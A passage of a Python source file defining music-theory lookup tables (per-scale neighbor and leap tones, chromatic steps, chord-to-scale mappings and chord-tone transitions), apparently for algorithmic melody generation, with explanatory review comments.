'E': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
'D': [ [ 'E', 'F' ], ['C', 'As', 'A'] ],
'G': [ [ 'A', 'As' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
},
'FMajor': {
'A': [ [ 'As', 'C' ], ['G', 'F', 'E'] ],
'C': [ [ 'D', 'E' ], ['As', 'A', 'G'] ],
'E': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
'D': [ [ 'E', 'F' ], ['C', 'As', 'A'] ],
'G': [ [ 'A', 'As' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
},
'CMinor': {
'C': [ [ 'D', 'Ds' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['Gs', 'G', 'F'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
},
'CsOct': {
'As': [ [ 'Cs', 'D' ], ['Gs', 'G', 'F'] ],
'B': [ [ 'Cs', 'D' ], ['As', 'Gs', 'G'] ],
'E': [ [ 'F', 'G' ], ['D', 'Cs', 'As'] ],
'D': [ [ 'E', 'F' ], ['Cs', 'As', 'Gs'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'Gs' ], ['E', 'D', 'Cs'] ],
'Cs': [ [ 'D', 'E' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'Cs' ], ['G', 'F', 'E'] ],
},
'CsMajor': {
'C': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Fs': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'Gs': [ [ 'As', 'C' ], ['Fs', 'F', 'Ds'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'C'] ],
'As': [ [ 'C', 'Cs' ], ['Gs', 'Fs', 'F'] ],
'Cs': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'Fs' ], ['Cs', 'C', 'As'] ],
},
'DsMajor': {
'C': [ [ 'D', 'Ds' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['Gs', 'G', 'F'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
},
'GsMinor': {
'B': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'E': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'As': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'Fs': [ [ 'Gs', 'As' ], ['E', 'Ds', 'Cs'] ],
'Cs': [ [ 'Ds', 'E' ], ['B', 'As', 'Gs'] ],
'Gs': [ [ 'As', 'B' ], ['Fs', 'E', 'Ds'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'B', 'As'] ],
},
'BMajor': {
'Fs': [ [ 'Gs', 'As' ], ['E', 'Ds', 'Cs'] ],
'E': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'As': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'B': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Cs': [ [ 'Ds', 'E' ], ['B', 'As', 'Gs'] ],
'Gs': [ [ 'As', 'B' ], ['Fs', 'E', 'Ds'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'B', 'As'] ],
},
'AsMinor': {
'C': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Fs': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'Gs': [ [ 'As', 'C' ], ['Fs', 'F', 'Ds'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'C'] ],
'As': [ [ 'C', 'Cs' ], ['Gs', 'Fs', 'F'] ],
'Cs': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'Fs' ], ['Cs', 'C', 'As'] ],
},
'AsMajor': {
'A': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'C': [ [ 'D', 'Ds' ], ['As', 'A', 'G'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'As', 'A'] ],
'G': [ [ 'A', 'As' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'A' ], ['Ds', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
},
'DsMinor': {
'Fs': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'Gs': [ [ 'As', 'B' ], ['Fs', 'F', 'Ds'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'As': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'F'] ],
'B': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Cs': [ [ 'Ds', 'F' ], ['B', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'Fs' ], ['Cs', 'B', 'As'] ],
},
'AMajor': {
'A': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'Fs': [ [ 'Gs', 'A' ], ['E', 'D', 'Cs'] ],
'E': [ [ 'Fs', 'Gs' ], ['D', 'Cs', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
'B': [ [ 'Cs', 'D' ], ['A', 'Gs', 'Fs'] ],
'Cs': [ [ 'D', 'E' ], ['B', 'A', 'Gs'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
},
'FMinor': {
'C': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'G'] ],
'Gs': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'G': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'Cs', 'C'] ],
'As': [ [ 'C', 'Cs' ], ['Gs', 'G', 'F'] ],
'Cs': [ [ 'Ds', 'F' ], ['C', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'G' ], ['Cs', 'C', 'As'] ],
},
'EMajor': {
'A': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'E'] ],
'B': [ [ 'Cs', 'Ds' ], ['A', 'Gs', 'Fs'] ],
'Gs': [ [ 'A', 'B' ], ['Fs', 'E', 'Ds'] ],
'Fs': [ [ 'Gs', 'A' ], ['E', 'Ds', 'Cs'] ],
'Cs': [ [ 'Ds', 'E' ], ['B', 'A', 'Gs'] ],
'E': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'Ds': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
},
'CHMinor': {
'C': [ [ 'D', 'Ds' ], ['B', 'Gs', 'G'] ],
'B': [ [ 'C', 'D' ], ['Gs', 'G', 'F'] ],
'Gs': [ [ 'B', 'C' ], ['G', 'F', 'Ds'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'B', 'Gs'] ],
'G': [ [ 'Gs', 'B' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'Gs' ], ['Ds', 'D', 'C'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'B'] ],
},
'GMinor': {
'A': [ [ 'As', 'C' ], ['G', 'F', 'Ds'] ],
'C': [ [ 'D', 'Ds' ], ['As', 'A', 'G'] ],
'D': [ [ 'Ds', 'F' ], ['C', 'As', 'A'] ],
'G': [ [ 'A', 'As' ], ['F', 'Ds', 'D'] ],
'F': [ [ 'G', 'A' ], ['Ds', 'D', 'C'] ],
'As': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
'Ds': [ [ 'F', 'G' ], ['D', 'C', 'As'] ],
},
'AMinor': {
'A': [ [ 'B', 'C' ], ['G', 'F', 'E'] ],
'C': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
'B': [ [ 'C', 'D' ], ['A', 'G', 'F'] ],
'E': [ [ 'F', 'G' ], ['D', 'C', 'B'] ],
'D': [ [ 'E', 'F' ], ['C', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['F', 'E', 'D'] ],
'F': [ [ 'G', 'A' ], ['E', 'D', 'C'] ],
},
'FsMajor': {
'Fs': [ [ 'Gs', 'As' ], ['F', 'Ds', 'Cs'] ],
'Gs': [ [ 'As', 'B' ], ['Fs', 'F', 'Ds'] ],
'F': [ [ 'Fs', 'Gs' ], ['Ds', 'Cs', 'B'] ],
'As': [ [ 'B', 'Cs' ], ['Gs', 'Fs', 'F'] ],
'B': [ [ 'Cs', 'Ds' ], ['As', 'Gs', 'Fs'] ],
'Cs': [ [ 'Ds', 'F' ], ['B', 'As', 'Gs'] ],
'Ds': [ [ 'F', 'Fs' ], ['Cs', 'B', 'As'] ],
},
'DMajor': {
'A': [ [ 'B', 'Cs' ], ['G', 'Fs', 'E'] ],
'B': [ [ 'Cs', 'D' ], ['A', 'G', 'Fs'] ],
'E': [ [ 'Fs', 'G' ], ['D', 'Cs', 'B'] ],
'D': [ [ 'E', 'Fs' ], ['Cs', 'B', 'A'] ],
'G': [ [ 'A', 'B' ], ['Fs', 'E', 'D'] ],
'Fs': [ [ 'G', 'A' ], ['E', 'D', 'Cs'] ],
'Cs': [ [ 'D', 'E' ], ['B', 'A', 'G'] ],
},
}
# Leap targets: OtherTones[scale][note] -> single-element list holding one
# alternative target tone.  In the diatonic scales this is the tone three
# scale degrees above the note (a diatonic fourth), e.g.
# OtherTones['CMajor']['A'] == ['D'].  The octatonic sections ('DOct',
# 'COct', 'CsOct') deviate from that rule for some notes — presumably the
# same deliberate tone-skips seen in NeighborTones/PassingTones; confirm.
OtherTones = {
'GsMajor': {
'C': [ 'F'],
'Gs': [ 'Cs'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Cs': [ 'G'],
'Ds': [ 'Gs'],
},
'CMajor': {
'A': [ 'D'],
'C': [ 'F'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'B'],
},
'DOct': {
'A': [ 'Ds'],
'C': [ 'Fs'],
'Fs': [ 'B'],
'Gs': [ 'D'],
'D': [ 'Fs'],
'F': [ 'A'],
'B': [ 'F'],
'Ds': [ 'Gs'],
},
'BMinor': {
'A': [ 'D'],
'Fs': [ 'B'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'Cs'],
'B': [ 'E'],
'Cs': [ 'Fs'],
},
'CArabic': {
'C': [ 'F'],
'B': [ 'E'],
'Gs': [ 'Cs'],
'G': [ 'C'],
'F': [ 'B'],
'Cs': [ 'G'],
'E': [ 'Gs'],
},
'CsMinor': {
'A': [ 'Ds'],
'Fs': [ 'B'],
'Gs': [ 'Cs'],
'B': [ 'E'],
'Cs': [ 'Fs'],
'E': [ 'A'],
'Ds': [ 'Gs'],
},
'FsMinor': {
'A': [ 'D'],
'B': [ 'E'],
'Gs': [ 'Cs'],
'D': [ 'Gs'],
'Fs': [ 'B'],
'Cs': [ 'Fs'],
'E': [ 'A'],
},
'GMajor': {
'A': [ 'D'],
'C': [ 'Fs'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'Fs': [ 'B'],
},
'COct': {
'A': [ 'Ds'],
'As': [ 'E'],
'C': [ 'E'],
'Fs': [ 'C'],
'E': [ 'A'],
'G': [ 'Cs'],
'Cs': [ 'Fs'],
'Ds': [ 'G'],
},
'EMinor': {
'A': [ 'D'],
'C': [ 'Fs'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'Fs': [ 'B'],
},
'DMinor': {
'A': [ 'D'],
'C': [ 'F'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'E'],
},
'FMajor': {
'A': [ 'D'],
'C': [ 'F'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'E'],
},
'CMinor': {
'C': [ 'F'],
'Gs': [ 'D'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Ds': [ 'Gs'],
},
'CsOct': {
'As': [ 'E'],
'B': [ 'F'],
'E': [ 'Gs'],
'D': [ 'G'],
'G': [ 'Cs'],
'F': [ 'As'],
'Cs': [ 'F'],
'Gs': [ 'D'],
},
'CsMajor': {
'C': [ 'F'],
'Fs': [ 'C'],
'Gs': [ 'Cs'],
'F': [ 'As'],
'As': [ 'Ds'],
'Cs': [ 'Fs'],
'Ds': [ 'Gs'],
},
'DsMajor': {
'C': [ 'F'],
'Gs': [ 'D'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Ds': [ 'Gs'],
},
'GsMinor': {
'B': [ 'E'],
'E': [ 'As'],
'As': [ 'Ds'],
'Fs': [ 'B'],
'Cs': [ 'Fs'],
'Gs': [ 'Cs'],
'Ds': [ 'Gs'],
},
'BMajor': {
'Fs': [ 'B'],
'E': [ 'As'],
'As': [ 'Ds'],
'B': [ 'E'],
'Cs': [ 'Fs'],
'Gs': [ 'Cs'],
'Ds': [ 'Gs'],
},
'AsMinor': {
'C': [ 'F'],
'Fs': [ 'C'],
'Gs': [ 'Cs'],
'F': [ 'As'],
'As': [ 'Ds'],
'Cs': [ 'Fs'],
'Ds': [ 'Gs'],
},
'AsMajor': {
'A': [ 'D'],
'C': [ 'F'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Ds': [ 'A'],
},
'DsMinor': {
'Fs': [ 'B'],
'Gs': [ 'Cs'],
'F': [ 'As'],
'As': [ 'Ds'],
'B': [ 'F'],
'Cs': [ 'Fs'],
'Ds': [ 'Gs'],
},
'AMajor': {
'A': [ 'D'],
'Fs': [ 'B'],
'E': [ 'A'],
'D': [ 'Gs'],
'B': [ 'E'],
'Cs': [ 'Fs'],
'Gs': [ 'Cs'],
},
'FMinor': {
'C': [ 'F'],
'Gs': [ 'Cs'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Cs': [ 'G'],
'Ds': [ 'Gs'],
},
'EMajor': {
'A': [ 'Ds'],
'B': [ 'E'],
'Gs': [ 'Cs'],
'Fs': [ 'B'],
'Cs': [ 'Fs'],
'E': [ 'A'],
'Ds': [ 'Gs'],
},
'CHMinor': {
'C': [ 'F'],
'B': [ 'Ds'],
'Gs': [ 'D'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'B'],
'Ds': [ 'Gs'],
},
'GMinor': {
'A': [ 'D'],
'C': [ 'F'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'As'],
'As': [ 'Ds'],
'Ds': [ 'A'],
},
'AMinor': {
'A': [ 'D'],
'C': [ 'F'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'C'],
'F': [ 'B'],
},
'FsMajor': {
'Fs': [ 'B'],
'Gs': [ 'Cs'],
'F': [ 'As'],
'As': [ 'Ds'],
'B': [ 'F'],
'Cs': [ 'Fs'],
'Ds': [ 'Gs'],
},
'DMajor': {
'A': [ 'D'],
'B': [ 'E'],
'E': [ 'A'],
'D': [ 'G'],
'G': [ 'Cs'],
'Fs': [ 'B'],
'Cs': [ 'Fs'],
},
}
# The 12 chromatic note names in ascending order (sharps-only spelling).
_CHROMATIC_SCALE = ['C', 'Cs', 'D', 'Ds', 'E', 'F', 'Fs', 'G', 'Gs', 'A', 'As', 'B']
# Note -> the note one semitone higher; wraps from 'B' back to 'C'.
PosChromatics = {
    note: _CHROMATIC_SCALE[(i + 1) % 12] for i, note in enumerate(_CHROMATIC_SCALE)
}
# Note -> the note one semitone lower; wraps from 'C' back to 'B'.
NegChromatics = {
    note: _CHROMATIC_SCALE[i - 1] for i, note in enumerate(_CHROMATIC_SCALE)
}
# Opening-note choices per scale: a piece starts on either the tonic or the
# dominant degree of its scale.
StartingPieceNotes = {
    'CMajor': ['C', 'G'],
}
# ChordsToScale: maps a chord name (triads, 7ths like 'Gs7'/'GMaj7'/'Em7',
# and diminished chords like 'CDim') to a list of scale names that the chord
# can resolve into. The first entry is usually the chord's own home scale.
# NOTE(review): some lists repeat a scale (e.g. 'Gs7' lists 'GsMajor' twice,
# 'C7' lists 'CMajor' twice) — presumably a deliberate weighting when a scale
# is picked at random from the list; confirm before deduplicating.
ChordsToScale = {
'AMinor': [ 'AMinor', 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor' ],
'CDim': [ 'CsMajor', 'AsMinor' ],
'Gs7': [ 'GsMajor', 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor', 'CHMinor' ],
'GMaj7': [ 'GMajor', 'CMajor', 'BMinor', 'GMajor', 'EMinor', 'CHMinor', 'AMinor', 'DMajor' ],
'GsDim': [ 'FsMinor', 'AMajor', 'CHMinor' ],
'GsMajor': [ 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor', 'CHMinor' ],
'Fs7': [ 'FsMajor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor' ],
'CMajor': [ 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor' ],
'Em7': [ 'EMinor', 'CMajor', 'BMinor', 'GMajor', 'EMinor', 'AMinor', 'DMajor' ],
'Dsm7': [ 'DsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor' ],
'Gsm7': [ 'GsMinor', 'CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'CHMinor', 'FsMajor' ],
'DMaj7': [ 'DMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor' ],
'Dm7': [ 'DMinor', 'CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor' ],
'Cm7': [ 'CMinor', 'GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor' ],
'CsMinor': [ 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor' ],
'FsMinor': [ 'FsMinor', 'BMinor', 'CsMinor', 'AMajor', 'EMajor', 'DMajor' ],
'DsMaj7': [ 'DsMajor', 'GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'GMinor' ],
'BMaj7': [ 'BMajor', 'CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'FsMajor' ],
'GMajor': [ 'GMajor', 'CMajor', 'BMinor', 'EMinor', 'CHMinor', 'AMinor', 'DMajor' ],
'EMinor': [ 'EMinor', 'CMajor', 'BMinor', 'GMajor', 'AMinor', 'DMajor' ],
'CsMaj7': [ 'CsMajor', 'GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor' ],
'FDim': [ 'DsMinor', 'CHMinor', 'FsMajor' ],
'DMinor': [ 'DMinor', 'CMajor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor' ],
'FMajor': [ 'FMajor', 'CMajor', 'DMinor', 'AsMajor', 'GMinor', 'AMinor' ],
'ADim': [ 'AsMajor', 'GMinor' ],
'CMinor': [ 'CMinor', 'GsMajor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor' ],
'EDim': [ 'DMinor', 'FMajor' ],
'B7': [ 'BMajor', 'CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'FsMajor' ],
'AMajor': [ 'AMajor', 'BMinor', 'CsMinor', 'FsMinor', 'EMajor', 'DMajor' ],
'A7': [ 'AMajor', 'BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor' ],
'Fm7': [ 'FMinor', 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor', 'CHMinor' ],
'DsMajor': [ 'DsMajor', 'GsMajor', 'CMinor', 'AsMajor', 'FMinor', 'GMinor' ],
'E7': [ 'EMajor', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor' ],
'C7': [ 'CMajor', 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor' ],
'GsMinor': [ 'GsMinor', 'CsMinor', 'BMajor', 'DsMinor', 'EMajor', 'CHMinor', 'FsMajor' ],
'Bm7': [ 'BMinor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor' ],
'G7': [ 'GMajor', 'CMajor', 'BMinor', 'GMajor', 'EMinor', 'CHMinor', 'AMinor', 'DMajor' ],
'Asm7': [ 'AsMinor', 'GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor' ],
'BMajor': [ 'BMajor', 'CsMinor', 'GsMinor', 'DsMinor', 'EMajor', 'FsMajor' ],
'Ds7': [ 'DsMajor', 'GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'GMinor' ],
'GsMaj7': [ 'GsMajor', 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor', 'CHMinor' ],
'AsMinor': [ 'AsMinor', 'GsMajor', 'CsMajor', 'DsMinor', 'FMinor', 'FsMajor' ],
'BDim': [ 'CMajor', 'CHMinor', 'AMinor' ],
'AsMajor': [ 'AsMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'GMinor' ],
'AMaj7': [ 'AMajor', 'BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor' ],
'DMajor': [ 'DMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor' ],
'AsDim': [ 'GsMinor', 'BMajor' ],
'Fsm7': [ 'FsMinor', 'BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor' ],
'Cs7': [ 'CsMajor', 'GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor' ],
'Gm7': [ 'GMinor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor' ],
'DDim': [ 'CMinor', 'DsMajor', 'CHMinor' ],
'CsMajor': [ 'CsMajor', 'GsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor' ],
'FMinor': [ 'FMinor', 'GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'CHMinor' ],
'EMajor': [ 'EMajor', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor' ],
'As7': [ 'AsMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor' ],
'F7': [ 'FMajor', 'CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor' ],
'FMaj7': [ 'FMajor', 'CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor' ],
'FsDim': [ 'GMajor', 'EMinor' ],
'GDim': [ 'GsMajor', 'FMinor' ],
'GMinor': [ 'GMinor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor' ],
'CsDim': [ 'BMinor', 'DMajor' ],
'DsDim': [ 'CsMinor', 'EMajor' ],
'EMaj7': [ 'EMajor', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor' ],
'FsMaj7': [ 'FsMajor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor' ],
'BMinor': [ 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor' ],
'CMaj7': [ 'CMajor', 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor' ],
'AsMaj7': [ 'AsMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor' ],
'D7': [ 'DMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor' ],
'Csm7': [ 'CsMinor', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor' ],
'FsMajor': [ 'FsMajor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor' ],
'Am7': [ 'AMinor', 'CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor' ],
'DsMinor': [ 'DsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'FsMajor' ],
}
ChordToneToNextChordTone = {
'CDim': {
'CsMajor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'C'], ['Fs', 'F', 'Ds'] ] ],
'AsMinor': [ [ ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'C'] ], [ ['C', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'C'], ['Fs', 'F', 'Ds'] ] ],
},
'Gs7': {
'GsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CMinor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'CsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'DsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'AsMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'FMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'B', 'Gs'], ['Ds', 'D', 'C'] ] ],
},
'GsDim': {
'FsMinor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'D'], ['B', 'A', 'Gs'], ['D', 'Cs', 'B'] ] ],
'AMajor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'D'], ['D', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'D'], ['B', 'A', 'Gs'], ['D', 'Cs', 'B'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['B', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['Gs', 'G', 'F', 'Ds'], ['B', 'Gs', 'G'], ['D', 'C', 'B'] ] ],
},
'GsMajor': {
'GsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'CMinor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'CsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
'DsMajor': [ [ ['Gs', 'As', 'C'], ['C', 'D', 'Ds'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'D', 'C'] ] ],
'AsMinor': [ [ ['Gs', 'As', 'C'], ['C', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['C', 'As', 'Gs'], ['Ds', 'Cs', 'C'] ] ],
